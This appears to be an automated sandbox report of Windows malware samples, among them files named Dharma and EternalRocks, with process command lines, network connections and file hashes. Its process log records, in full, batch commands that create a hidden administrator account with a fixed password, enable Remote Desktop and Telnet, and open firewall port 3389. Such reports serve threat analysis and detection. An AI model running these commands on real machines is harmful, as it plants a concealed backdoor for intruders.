"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\JoinDisable.bat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5876 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4864 /prefetch:8
C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
C:\Users\Admin\Desktop\New folder\Dharma.exe
"C:\Users\Admin\Desktop\New folder\Dharma.exe"
C:\Users\Admin\Desktop\New folder\ac\nc123.exe
"C:\Users\Admin\Desktop\New folder\ac\nc123.exe"
C:\Users\Admin\Desktop\New folder\ac\mssql.exe
"C:\Users\Admin\Desktop\New folder\ac\mssql.exe"
C:\Users\Admin\Desktop\New folder\ac\mssql2.exe
"C:\Users\Admin\Desktop\New folder\ac\mssql2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\New folder\ac\Shadow.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\New folder\ac\systembackup.bat" "
C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe
"C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
C:\Windows\SysWOW64\find.exe
Find "="
C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
C:\Windows\SysWOW64\find.exe
Find "="
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
C:\Windows\SysWOW64\net.exe
net start Telnet
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
C:\Users\Admin\Desktop\New folder\EternalRocks.exe
"C:\Users\Admin\Desktop\New folder\EternalRocks.exe"
C:\Users\Admin\Desktop\New folder\Fagot.a.exe
"C:\Users\Admin\Desktop\New folder\Fagot.a.exe"
C:\Users\Admin\Desktop\New folder\Fantom.exe
"C:\Users\Admin\Desktop\New folder\Fantom.exe"
C:\Users\Admin\Desktop\New folder\Flasher.exe
"C:\Users\Admin\Desktop\New folder\Flasher.exe"
C:\Users\Admin\Desktop\New folder\FlashKiller.exe
"C:\Users\Admin\Desktop\New folder\FlashKiller.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3632 -ip 3632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 252
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa39d2055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.58.20.217.in-addr.arpa | udp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:9050 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c4a10f6df4922438ca68ada540730100 |
| SHA1 | 4c7bfbe3e2358a28bf5b024c4be485fa6773629e |
| SHA256 | f286c908fea67163f02532503b5555a939f894c6f2e683d80679b7e5726a7c02 |
| SHA512 | b4d407341989e0bbbe0cdd64f7757bea17f0141a89104301dd7ffe45e7511d3ea27c53306381a29c24df68bdb9677eb8c07d4d88874d86aba41bb6f0ce7a942c |
\??\pipe\LOCAL\crashpad_1640_RFFVFYFQOMVLDGMG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4c3889d3f0d2246f800c495aec7c3f7c |
| SHA1 | dd38e6bf74617bfcf9d6cceff2f746a094114220 |
| SHA256 | 0a4781bca132edf11500537cbf95ff840c2b6fd33cd94809ca9929f00044bea4 |
| SHA512 | 2d6cb23e2977c0890f69751a96daeb71e0f12089625f32b34b032615435408f21047b90c19de09f83ef99957681440fdc0c985e079bb196371881b5fdca68a37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 762ac6cf1c5afa793e5b3795a3023f37 |
| SHA1 | 204314169c9973a5034ab6862baf03664617a698 |
| SHA256 | 5fb74f484b7ac7c0eb558c847c9637abcef2466f8bf886cddc89f96169fd6c42 |
| SHA512 | 1b3e8285ea8dedc918830e70a49b18dcca7c0a50a50ce52ace19c283c07a48970527035569fc5a84f7d2be8f0e4f83adbeb4271090b4fc5668e9463e0bef5a6b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | aeef071f89b92439598ec6f32a6ab9d2 |
| SHA1 | e4acfba9b2fb0ff787797de3a5755650c2d54d3b |
| SHA256 | e25631cce2bfe93d8da8e75e78d66537e332a2a3f5ebb648f8c51376bd144b1c |
| SHA512 | 2d1910105f37950ae2df0a6f2395beb01e234e53f6bb17b956d267dee4cb923275894555a5e675dca99bd3b7e559eb3634c4861b813655eae604f2af12e93284 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4014b569442a9344b2f84ffe240de1c0 |
| SHA1 | 90704788dfbb2560cf92bff05fb5e2f157b48ffd |
| SHA256 | cbf8357f9f1b873ea65c631fab89eada13abe75b77f4fa2af69da93235cb9bc1 |
| SHA512 | 8c1066f56a01918f38d4aaac8aaeb92a3300d1c85918d19c0a351a164b86b709263f68b9be2b364fb97e5717b0409ef1da31ec35eee97445c13bce826085d07d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8107fb347bc11e65085f96739a379577 |
| SHA1 | 20beb3369f74b6c953369c0fc647d8af33daa023 |
| SHA256 | 197ece9a50b64500b8581d4b2e541959ca24507c4619990bfc53a3de9fbad392 |
| SHA512 | 74de0dc5f44c3ea55495660e557e350a499d4458a753ca8b5b5981997c7eb13a41913b9cdf07c6aeb15e6950f0eeab429ea4407c6a784d2c82f1c7f8702837b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4efbea40fa27745b18612d929cd6285a |
| SHA1 | c69cc6bcbaaa3332f287854a4515d9832807cf10 |
| SHA256 | 47d69bfcbee5326e703f87d641bbdbaefefefea564a477209e40608a3797f0f2 |
| SHA512 | 83719e88edeb3f498b552987e0fb3c51189a7667e47a305e91db91db88e31a82c09556daad9dee7fbecc0b72c094e7bb0675794ee2b1e29d136af94825ee3bda |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57f28e.TMP
| MD5 | 6738ca3172ec5eebd3fba0c288537f15 |
| SHA1 | 05d10f4574e5e21933ed2f9b4bc73d1cc2306565 |
| SHA256 | 7bf09c5a7cd46bf1638a44ec1c262f6d5d86b6a6a1388c99a807f756b88d82df |
| SHA512 | 3e569c9b969db10abf100abcc81f0915c6ffc43f03130960c084d71672ecf2175ca5fd75dec9213c98147b6cc932ad440f8c152cd5d1eb563e4b0892b20ac0e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 84660d1b714c0f2d75a6c7f86c28d018 |
| SHA1 | 22831ffddcdf05bdde175b21f42b071502f5e934 |
| SHA256 | bc5124e822a9ac7ba2fa759cda233b1234000b7d9c1e319a983b018c3ea40b57 |
| SHA512 | aef2a524257a449569e288388d191741ffeaa4b7ee01ed9753279520ce8ec8e49fae71749909f70386c993bcb54888d03c1d437e082f813f49900d30692d86d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 30bdf2444f6bad7769bf52dc94333330 |
| SHA1 | cfe07b41b28aa8c044cf2a61b21be68fc61548eb |
| SHA256 | 8abc9818231ea0f72467aaef1f4edade135c2bf672d9b1c28da1a174788ced3d |
| SHA512 | 79fbf157766759e3c30b82bb49c11509f7efc2f9a80d68d8ec945dcbf5fce1e9836d408d47ef87ccc6d526d693cd1931bedc513cd6afb931ff896854a82a11a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 658e7eba3db9936d0f753d6c6e7dab7f |
| SHA1 | 17c03fb7a61e85d614e72d856fab6f5147ed8a22 |
| SHA256 | 04128d20dcbc66c653970fc1bc1540675302f1efb167efffd0ef4c38ee431b16 |
| SHA512 | db36fd9eca7258f482cbc8d497e82500fa2c0ffd5709f9c235ec085c50848ed4763fb070c013f7bb4eeb1d9d5993cb92fbc0f3f4e7eddcd76a4503a01f1c81b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 94716db8a4f3d9b64b6c3234c31ab99e |
| SHA1 | 212ef4fb095c5d4f3f7cf7ffb3d4bdbd175b270f |
| SHA256 | 31b69e06e12f39d0cf66a18d7ae456a451f7a085d6adc5891f4268771dc2398e |
| SHA512 | 1f6cacaa86694623245f1e1b70252b319c7ffac2fb554a038f780242216ff197e0ec38a6f28aad8bf142c25ed9cd05f23516dd9b5b03a811ed6eb40daf4c2d0e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 28495c4da1e6e39db55be4459aacb430 |
| SHA1 | 4c211ffbd54d56eda28b41ebdeeb2376aa53cf84 |
| SHA256 | 284a1fa26df45e1ce4299f4a8228891b2af44129515f976723e8147c25ab0f07 |
| SHA512 | cf28fdd1969d2059b1af83f3f1191649bb4318efd984901c5d78b8267575b2ce1b6b54ba56b7cae23da6870f6a28dacee709486079cec4416a6ef9264145d3da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bcc50938802d59cddba84b0da32c9cc9 |
| SHA1 | c2aee7cbf2a5ffdbd0890a41eaee9904d28000e3 |
| SHA256 | 5c0238f4b5acdc134b2eb22dab53d19f22534da260757edbf2ce6bc206344e78 |
| SHA512 | 2d4a23422b23c6976af40057f8051faa1119f02edfdb4f85bf123e2cff18bc8c97c97d30f2b3eaf4c25d5deea2ddcb03f73f535e5c5869723604c641344a6202 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b9dba548b942827cb97560c363d56603 |
| SHA1 | def78a6c9341a233272e3bedc97ce35966a824c9 |
| SHA256 | 38bace7d1a970b7a52fca220ea8f6c354cb9618e87d657e0f094a6cd6c38b7ee |
| SHA512 | 088116f7b255ed9031ff233ecf5e877cec9e9a3a1365f559a45d827de0c3edec902ceb117b7c359503f24aaaf9dd570ded9618b8e7193f698467b435696f55aa |
C:\Users\Admin\Downloads\JoinDisable.bat
| MD5 | 9f6ce15b306724624088a791aac95c9a |
| SHA1 | 7b620c0fe920960715bb25530f21364e0cecf5f7 |
| SHA256 | abe3fd7e9cfbb403c75bf3a7d0a8323558d52c1ad0fc3c63fcc30dc352f2fe6c |
| SHA512 | 8604290725f5b837505b0de2cecc1ab9dd7331399913a0fec8c4529933c5c9b44c81a0a52b96bba41f2baa1a2c9e0d12a3859c01117d5757607a6c9f53c440f7 |
C:\Users\Admin\Downloads\PublishMove.ods
| MD5 | b9ddc3527db393a9255a5e713ae569ca |
| SHA1 | 2416c0aa8fdab4847ed4929d489dde54e1d74735 |
| SHA256 | c80fbbc731b72d729ec3a5d3ac62333f4381e3c0651d48c38e1f7d7c4e13d9a4 |
| SHA512 | ea327343ed481341e73f37116ea031cc32cd31215f4a6d6bfd5ef2adbcf76db73862f8509ba035fac0fff0a65583b99ce20c5ebc6ce421d64733a7791f5010f9 |
C:\Users\Admin\Downloads\WaitGroup.ps1
| MD5 | 5499ce469f6908c797da028fc6b12072 |
| SHA1 | 1c9ea18d896c01d6a37ae4f664141dfe12856ab7 |
| SHA256 | fed1c3da02ad0a69e52a59ee0b78e79702b54fca99e3c10d133e4f0833e83e82 |
| SHA512 | 81f758453c69c1fc7eab3662a18f9a9f3403daf185bde8d24d0a781f36fb1b98e256b454312e22f52549cb7a1a426902acde49bfd2a6e4d9a398a694b12d9035 |
C:\Users\Admin\Downloads\EnableSearch.zip
| MD5 | cbd220e2052c6b9561b1660483011250 |
| SHA1 | da4180caae45dec6664eefde791d4b0e149636db |
| SHA256 | 9879f60bc46ab9e1e9ff3431d2251a7f695bceb119d83ec8ac3d14ad08287b3d |
| SHA512 | 76df74d60dd4707743d3243b32bcd2ce460fe11a9604731a99b76c3476febcc2432c6f9440eb28e0ac30072adcd2fb81dd97db14b0d9623ef6be4a598f15598f |
C:\Users\Admin\Downloads\EnterCompress.mht
| MD5 | 1806f5d375c401256b1256f9556fed2a |
| SHA1 | 0e67044ff4cf18afbcecdcf58a6627e693021f4d |
| SHA256 | e005459b637e2adbfcad3256f17c79231625f3b2300a80b8e4a540ecc9adc8f9 |
| SHA512 | 81a072557b2032708d50d8f6f7609ae6d082dc59c7c897f91fb291d50a03487964e14e636ed25e6df9b446f3584be6fc0fb8db1df31c9fdddcc6e4577a272cd3 |
C:\Users\Admin\Downloads\AssertRestore.vssm
| MD5 | 2209c620eeff3e0369c7c7fca2d45c29 |
| SHA1 | 8fbb4925d263a9f11ea3f8a9d3360f8f9f78965e |
| SHA256 | e8cc0620935c89eb7bccdfc7c55048cbd27f3d1881c739bd743e5be918587f0c |
| SHA512 | 60f627080dda63dcdd9173c8e81ee6a72d4983cc2f6a6bc048eee2327b0a8376fac613abb1e14b1669f84c41e4e357010ba9ae1691ddd22677afe2ceeb179bed |
C:\Users\Admin\Downloads\ExitSync.potx
| MD5 | ebbc5bb705d5878504f217cbf85f803d |
| SHA1 | 3cded51b8d006125142914496eeed16225266d2e |
| SHA256 | a8a195c1bffdb3d6d3c6b7a2f754f1f9875b6a7b0ef351903a97578450b8f6c2 |
| SHA512 | 6d086f2542fc027e76bbbb724e25e3271a328ef681217eeb314e82bef30afe118e804021351b57499a1f1bc7b577b054c52d18b55f3945395948c35d546bfca1 |
C:\Users\Admin\Downloads\AddEnable.wmv
| MD5 | 9bd8efde468dcfd829d6cb7c1ae8924f |
| SHA1 | ef6abcc8554157653059650eefbc71ecdf38647d |
| SHA256 | 9d7e3db8512361210b0f73c1e053c652a1d656bf568399ae1b3c424752e1c3f4 |
| SHA512 | 722dafe327068a8d754d272df93725ddca97cc8b5e1c7b3b8a6b6a1b21a28e35ce916ff7c877c1ca6555cb15ae7b0c7f2e08df5ff9ab206418d80b5f32158819 |
C:\Users\Admin\Downloads\ExitLock.pcx
| MD5 | 4d12854ab8440439930f202b7526b1c5 |
| SHA1 | 9bcdc87f9b14170c946a3a45e47b82d4b1863657 |
| SHA256 | ec6a59eab50853fece701fece9dac8709821f9c3aca4efca9cf470b7cd084b2c |
| SHA512 | fdb6169e6277a670f007c4309bed2cd1e520b7584c49765a1ce25c1e0fd2700b952e24c49b162de6ba8523c714d4754ca27597a1123c16b1411da6c124a2ceea |
C:\Users\Admin\Downloads\AddDeny.rtf
| MD5 | 64300d46de17a787c47ddc1f187117d4 |
| SHA1 | 22ee46f6c069bbad90cffc32de3546ef5e9fe1bf |
| SHA256 | 9e390a38e70228ab26b66de0fe2f96af723d7830feabb4a827fb139aa2e674dc |
| SHA512 | 0a236698b5771a152d46548b311c7512137211fde19e8d6b87de82fe7ed6d374d693de0f12008fcfcd1cb6cd426316c8c6b23d440171f01b61badb490ffc40dd |
C:\Users\Admin\Downloads\MountRepair.rtf
| MD5 | 35a44dab39c06ac36b1abe4bb982314a |
| SHA1 | 62c2dbad0eb378ef50c88c1e84f3da089ed1a36b |
| SHA256 | 03422f402390addbecf3da5116faf063ad590a1d105a3d8237833d83ab5f6f53 |
| SHA512 | 1221fcb6fa483546832ea6e62673e227d2c45e37420578b3468c3f0f4da1c67d8ab5577dd90ff53bee463ec3afef48afad0291675151b6feaafc8132082dbcf6 |
C:\Users\Admin\Downloads\ReceiveSet.jpe
| MD5 | bfb4fbb056c28683f4da70f83b48c996 |
| SHA1 | 368ebeac5d1b145f9f6a08120c11d68945e4bc8c |
| SHA256 | b1853e491ec7a58f81166242d1add8e08099d9381642a70894678851c1857983 |
| SHA512 | 26735acb804b83eebd642b84237c936694a63ee6eb873fbce100bb717fc2662cd2a2ce3788ef18f476c33a12269c5dcfa7b4d18b40585c70cfc14b4cbd65a9d0 |
C:\Users\Admin\Downloads\CopyEnable.tiff
| MD5 | d9ece229a42606e686041a0258f59668 |
| SHA1 | 27c39776f724aed7ed5e6bea537d71d3dfef6480 |
| SHA256 | 279a4b071e2ae0741b7be51cb751fa95984aba61d14f767177a4813ba08b5735 |
| SHA512 | c8773af25e6edefbd60564f1b3dfd06807f3064b103d1f01216a0ff56bfc7e76c85d518d49a0a4a6e445f5dfcd13c3874c3cd4b8e8b1c6a2ccf074897b0d380d |
C:\Users\Admin\Downloads\PopRedo.kix
| MD5 | 89e63783be67d5879ee3366ab4407e00 |
| SHA1 | 2dae8991faa4c8eb31fd67e941aedcbdd35ea37b |
| SHA256 | e7c007d7a7812951df8462a5ef454909a0ededc845fdde9f5bf0390030f118cc |
| SHA512 | c9c388af69afc62803a49114215ba4fe3d7a844a1e1a18565babb2e1f274fea47ed2a9e332ac37172915e14d79205455af68eaa0cbcefc4a3820fe4e89ac7a44 |
C:\Users\Admin\Downloads\MovePop.sys
| MD5 | a4f4d0028d575480e2305c083cde584f |
| SHA1 | c806f61380a865470e78abb7ef312df403cbc7b6 |
| SHA256 | 0b8bc0d1467d6963bb5696f1b8b9da22ad51d1940cbb7d05f57687259ddd95e0 |
